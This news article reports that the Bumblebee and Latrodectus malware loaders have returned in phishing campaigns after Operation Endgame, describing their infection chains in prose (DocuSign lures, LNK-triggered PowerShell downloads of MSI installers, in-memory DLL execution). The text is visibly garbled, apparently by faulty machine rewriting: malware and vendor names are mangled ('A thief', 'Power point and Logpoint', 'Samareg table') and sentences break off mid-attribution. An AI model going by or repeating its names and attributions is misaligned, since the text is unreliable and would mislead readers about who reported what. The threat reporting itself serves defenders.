Two malware families hit after coordinated law enforcement operation called Endgame have reappeared as part of new phishing campaigns.
Bumblebee and A thiefwhich are both malware downloaders designed to steal personal data and download and execute additional payloads on compromised hosts.
Tracked as BlackWidow, IceNova, Lotus or Unidentified 111, Latrodectus, also considered successor to IcedID due to overlapping infrastructure between the two malware families. It was used in companies associated with two Initial Access Brokers (IABs) known as TA577 (aka Water Curupira) and TA578.
A coalition of European countries announced this in May 2024 disassembled over 100 servers associated with multiple malware strains such as IcedID (and by extension Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee and TrickBot.
“Although Latrodectus was not mentioned in the operation, it was also affected and its infrastructure was disabled,” Bitsight security researcher Joao Batista noted back in June 2024.
Cybersecurity firm Trustwave, in an analysis published earlier this month, described Latrodectus as a “distinct threat” that got a boost after Operation Endgame.
“Although Latrodectus was initially impacted, it quickly recovered. Its advanced capabilities have filled the void left by its limited counterparts, proving itself to be a formidable threat,” the cybersecurity company reports. said.
Attack chains are typically used by spam campaigns using captured email streams and impersonating legitimate entities such as Microsoft Azure and Google Cloud to activate the malware deployment process.
The recently observed sequence of infection by Power point and Logpoint follows the same route: DocuSign-themed emails with PDF attachments containing a malicious link or HTML files with embedded JavaScript code created to download an MSI installer and a PowerShell script, respectively.
Regardless of the method used, the attack ends up deploying a malicious DLL file, which in turn launches the Latrodectus malware.
“Latrodectus leverages legacy infrastructure combined with an innovative new method of distributing malware payloads across the financial, automotive and business sectors,” said Forcepoint researcher Mayur Sewani.
The current Latrodectus campaigns are coupled with the return of the Bumblebee downloader, which uses a ZIP archive as its delivery mechanism, likely downloaded via phishing emails.
“The ZIP file contains an LNK file called ‘Report-41952.lnk’ which, when executed, triggers a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL to disk,” Netskope researcher. Leandro Froes said.
The LNK file is for running a PowerShell command to download the MSI installer from a remote server. Once launched, the MSI samples masquerading as installers from NVIDIA and Midjourney serve as conduits to launch the Bumblebee DLL.
“Bumblebee uses a more stealthy approach to avoid spawning other processes and avoids writing the final payload to disk,” Froes noted.
“It is done with help Samareg table to force the DllRegisterServer export function present in the File a table An entry in the SelfReg table acts as a key to indicate which file to execute in the File table, and in our case it was the final DLL of the payload.”
